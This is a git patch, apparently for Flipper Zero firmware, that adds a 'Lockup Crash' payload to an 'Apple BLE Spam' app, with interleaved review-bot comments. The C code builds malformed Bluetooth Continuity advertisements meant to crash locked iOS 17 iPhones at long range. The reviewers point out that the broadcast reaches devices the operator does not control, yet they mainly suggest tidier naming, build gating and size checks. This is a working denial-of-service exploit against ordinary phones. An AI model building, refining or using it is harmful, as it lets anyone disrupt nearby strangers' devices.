From d2d0f2844917c0617ac86b884e14f4b2b4a92a73 Mon Sep 17 00:00:00 2001 From: Willy-JL <49810075+Willy-JL@users.noreply.github.com> Date: Sun, 1 Oct 2023 01:39:01 +0100 Subject: [PATCH] iOS 17 CRASH for Apple BLE Spam --- .../external/apple_ble_spam/apple_ble_spam.c | 8 +++++++ .../lib/continuity/continuity.c | 22 +++++++++++++++++++ .../lib/continuity/continuity.h | 4 ++++ 3 files changed, 34 insertions(+) diff --git a/applications/external/apple_ble_spam/apple_ble_spam.c b/applications/external/apple_ble_spam/apple_ble_spam.c index 1ab1c8777..0d38c9ad0 100644 --- a/applications/external/apple_ble_spam/apple_ble_spam.c +++ b/applications/external/apple_ble_spam/apple_ble_spam.c @@ -184,6 +184,14 @@ static Payload payloads[] = { .data = {.nearby_info = {}}, }}, #endif + {.title = "Lockup Crash", + .text = "iOS 17, locked, long range", + .random = false, + .msg = + { + .type = ContinuityTypeCustomCrash, + .data = {.custom_crash = {}}, + }}, {.title = "Random Action", .text = "Spam shuffle Nearby Actions", .random = true, diff --git a/applications/external/apple_ble_spam/lib/continuity/continuity.c b/applications/external/apple_ble_spam/lib/continuity/continuity.c index 3d50107b1..9d6856adc 100644 --- a/applications/external/apple_ble_spam/lib/continuity/continuity.c +++ b/applications/external/apple_ble_spam/lib/continuity/continuity.c @@ -1,5 +1,6 @@ #include "continuity.h" #include +#include // Hacked together by @Willy-JL // Custom adv logic by @Willy-JL (idea by @xMasterX) @@ -16,6 +17,7 @@ static const char* continuity_type_names[ContinuityTypeCount] = { [ContinuityTypeTetheringSource] = "Tethering Source", [ContinuityTypeNearbyAction] = "Nearby Action", [ContinuityTypeNearbyInfo] = "Nearby Info", + [ContinuityTypeCustomCrash] = "Custom Packet", }; const char* continuity_get_type_name(ContinuityType type) { return continuity_type_names[type]; 
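Review bot: The "Lockup Crash" entry is added after the `#endif`, so it is compiled into every build and listed next to the "Random Action" entry, even though its title says it crashes the receiver rather than showing a prompt. A BLE advertisement is broadcast, so the effect is not confined to a device the operator controls, and `.text = "iOS 17, locked, long range"` names no affected or fixed version. I would put the entry behind its own build-time switch, as the entries above the `#endif` appear to be, and leave it out of default builds. The `payloads[]` initializer starts and ends outside this hunk, so the condition that the `#endif` closes is not visible here.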
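Review bot: The display name `"Custom Packet"` in `continuity_type_names` does not match the enum constant `ContinuityTypeCustomCrash` or the menu title "Lockup Crash" added in apple_ble_spam.c, so one payload goes by three names. A single name in all three places would keep UI text and any logging unambiguous, for example `[ContinuityTypeCustomCrash] = "Custom Crash",`. The array initializer starts above this hunk.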
@@ -30,6 +32,7 @@ static uint8_t continuity_packet_sizes[ContinuityTypeCount] = { [ContinuityTypeTetheringSource] = HEADER_LEN + 6, [ContinuityTypeNearbyAction] = HEADER_LEN + 5, [ContinuityTypeNearbyInfo] = HEADER_LEN + 5, + [ContinuityTypeCustomCrash] = HEADER_LEN + 11, }; uint8_t continuity_get_packet_size(ContinuityType type) { return continuity_packet_sizes[type]; @@ -135,6 +138,25 @@ void continuity_generate_packet(const ContinuityMsg* msg, uint8_t* packet) { packet[i++] = (rand() % 256); // ... break; + case ContinuityTypeCustomCrash: + i -= 2; // Override segment header + + packet[i++] = ContinuityTypeNearbyAction; // Type + packet[i++] = 0x05; // Length + packet[i++] = 0xC1; // Action Flags + const uint8_t types[] = {0x27, 0x09, 0x02, 0x1e, 0x2b, 0x2d, 0x2f, 0x01, 0x06, 0x20, 0xc0}; + packet[i++] = types[rand() % COUNT_OF(types)]; // Action Type + furi_hal_random_fill_buf(&packet[i], 3); // Authentication Tag + i += 3; + + packet[i++] = 0x00; // ??? + packet[i++] = 0x00; // ??? + + packet[i++] = ContinuityTypeNearbyInfo; // Type ??? + furi_hal_random_fill_buf(&packet[i], 3); // Shenanigans (Length + IDK) ??? + i += 3; + break; + default: break; } diff --git a/applications/external/apple_ble_spam/lib/continuity/continuity.h b/applications/external/apple_ble_spam/lib/continuity/continuity.h index 01a53364c..0437f5834 100644 --- a/applications/external/apple_ble_spam/lib/continuity/continuity.h +++ b/applications/external/apple_ble_spam/lib/continuity/continuity.h @@ -18,6 +18,8 @@ typedef enum { ContinuityTypeTetheringSource = 0x0E, ContinuityTypeNearbyAction = 0x0F, ContinuityTypeNearbyInfo = 0x10, + + ContinuityTypeCustomCrash, ContinuityTypeCount } ContinuityType; @@ -40,6 +42,8 @@ typedef union { } nearby_action; struct { } nearby_info; + struct { + } custom_crash; } ContinuityData; typedef struct {
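Review bot: Nothing ties the bytes written by the new `case ContinuityTypeCustomCrash:` to the `HEADER_LEN + 11` entry added to `continuity_packet_sizes` in the previous hunk. The case steps back with `i -= 2` and then writes 13 bytes, which ends 11 bytes past the header only if `i` equals `HEADER_LEN` on entry to the switch, and that code is outside the hunk. `packet` is passed without a length, so a later edit to either side would silently write past whatever the caller sized from the table. I would record the count at the case, `// writes 13 bytes from i - 2, i.e. HEADER_LEN + 11 in total; keep in sync with continuity_packet_sizes`, and compare `i` with the table value after the switch if the function has the size to hand. Separately, `types[]` is declared in the switch scope without braces and indexed with `rand()` while the following bytes use `furi_hal_random_fill_buf`; a braced case with `static const uint8_t types[]` and a single random source would be more consistent.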
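Review bot: `ContinuityTypeCustomCrash` has no explicit value, so it becomes 0x11 only by following `ContinuityTypeNearbyInfo = 0x10`, while the other visible members carry explicit values. Going by the `// Override segment header` comment in continuity.c, this member seems to be an internal selector whose value is replaced in the packet, which a reader of the header cannot tell. A comment such as `// Internal pseudo-type: not a protocol value, overridden in continuity_generate_packet()` would document that and would flag the collision if a real type 0x11 is added later. The enum starts above the hunk.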